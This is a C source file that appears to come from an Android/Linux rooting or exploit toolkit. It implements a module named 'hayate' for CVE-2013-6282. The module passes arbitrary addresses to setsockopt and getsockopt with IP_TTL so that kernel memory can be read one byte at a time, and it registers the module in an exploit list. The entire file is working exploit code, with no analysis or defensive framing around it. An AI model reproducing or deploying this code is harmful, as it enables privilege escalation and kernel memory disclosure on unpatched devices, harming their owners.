
#include "log.h"
#include "exploit.h"
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <malloc.h>
#include <stdlib.h>
#include <string.h>

extern long __ptrace(int request, pid_t pid, void *addr, void *data);


static int socket_init(void **opaque) {
    int fd;

    *opaque = (void *) -1;
    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (fd < 0)
        return -1;
    *opaque = (void *) fd;
    return 0;
}

static void socket_free(void **opaque) {
    int fd;

    fd = (int) *opaque;
    if (fd >= 0)
        close(fd);
}

static int socket_read32(void *opaque, long addr, long *val) {
    int rc, fd, i;
    socklen_t l;

    fd = (int) opaque;
    for (i = 0; i < sizeof(*val); i++) {
        rc = setsockopt(fd, SOL_IP, IP_TTL, (void *)(addr + i), 1);
        if (rc < 0)
            return -1;
        l = 1;
        rc = getsockopt(fd, SOL_IP, IP_TTL, (void *)((char *) val + i), &l);
        if (rc < 0)
            return -1;
    }

    return 0;
}

exploit_t EXPLOIT_cve_2013_6282_socket = {
    .name = "hayate",
    .init = socket_init,
    .free = socket_free,
    .read32 = socket_read32,
};

void exploit_init(exploit_t **list) {
    int i = 0;
    int size = 0;
    exploit_t *exp = 0, *tmp;

    ADDEXP(cve_2013_6282_socket);

//    switch (g_type) {
//
//    case S_2013_6282_3:
//    	ADDEXP(cve_2013_6282_socket);
//    	break;
//
//    default:
//    	break;
//    }

    *list = exp;
}
